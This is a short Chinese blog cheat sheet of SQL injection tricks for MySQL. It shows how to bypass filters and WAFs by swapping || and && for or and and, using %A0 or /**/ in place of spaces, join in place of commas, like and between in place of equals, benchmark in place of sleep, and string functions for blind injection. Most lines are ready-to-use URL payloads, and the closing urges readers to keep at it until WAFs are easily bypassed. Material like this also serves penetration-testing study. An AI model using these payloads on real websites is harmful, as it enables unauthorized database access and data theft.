SQL注入-特殊小技巧
or替代
当发现or被过滤时,我们可以用”||”替代
?id = 2' or 1=1 --+?id = 2' || 1=1 --+and替代
当发现and被过滤时,我们可以用”&&”替代
?id = 1' and 1=1 --+?id = 1' && 1=1 --+异或运算符 ”^”
异或运算符”^”过滤时,用”XOR”替代
?id=1 union select 1=1 XOR 1=1--+?id=1 union select 1=1 ^ 1=1 --+逗号
逗号被过滤可以使用join函数将参数连接起来
?id=1 union select 11,22,33--+?id=1 union select * from (select 11)a join (select 22)b join (select 33)c --+空格
当空格被过滤删除时,使用加号 +,或者空字符串来代替
通用空字符串:%0a %0b %0c %0d %A0 %20 %09
特别注意 %A0 这个不会被php的\s进行匹配
使用内联注释也可以代替空格/**/
?id=1 and 1=1 --+?id=1%A0and%A01=1%A0--+?id=1/**/and/**/1=1/**/--+等于号”=”
当等于号”=”被过滤时,可以使用很多种函数替代
1.Between:在什么什么之间
select database() between 0x61 and 0x7a2.in:in常用于mysql的where表达式中来查询某个范围内的数据
select * from user where id in (1,2,3)?id=2 and 1 like 1?id = 1.1 and 1=1left(str, length)
从左边length位截取字符串
select left(‘abcdefghijklmn’,8)结果为:abcdefgh
right(str,length)
使用方法同left
mid(str,start,length)
截取字符串从start开始并截取length长度,相当于substr()
Locate(substr,str)
locate是用来返回字符串的位置
locate(substr,str)返回字符串substr中第一次出现str的位置
select locate("d",'www.baidu.com') #返回8SELECT locate("a",'pan.baidu.com',3)#返回6
select locate('m','m123456m',15)position (substr IN str)
position 的效果与instr(),locate()相同,但语法不同
用法:POSITION(substr IN str) 返回字符串substr中第一次出现str的位置与LOCATE(substr,str)的结果相同
例:返回字符串“d”自一次出现的位置
SELECT position("d"in’www.baidu.com’);结果:8
替代ascii
Hex(),Bin(),Ord()
字符串截取函数在mysql中有许多,主要利用得当,一样可以达到盲注的效果
当sleep函数被过滤,可以使用benchmark函数。他是指执行某函数的次数,次数多了照样实现sleep函数相同的时间延迟。
benchmark(100000,SHA1(‘1’)), 1database(),version()被过滤
当database(),concat()函数被过滤,可以在名和括号之间加入特殊字符,例如
database/**/()`version`()报错注入
报错注入是利用某些函数报错,来爆出所需要的内容
可以阅读此文章来了解报错注入:
https://www.cnblogs.com/richardlee97/p/10617115.html
总结
在SQL注入过程中难免会有磕磕绊绊,不要放弃,静下心来钻研,总会有解决之法。
尤其是后端的各种过滤,WAF的拦截等等,慢慢研究就会轻松绕过。
SQL注入不会的可以阅读我的这两篇博客了解一下。
sql手工注入
数据库类型判断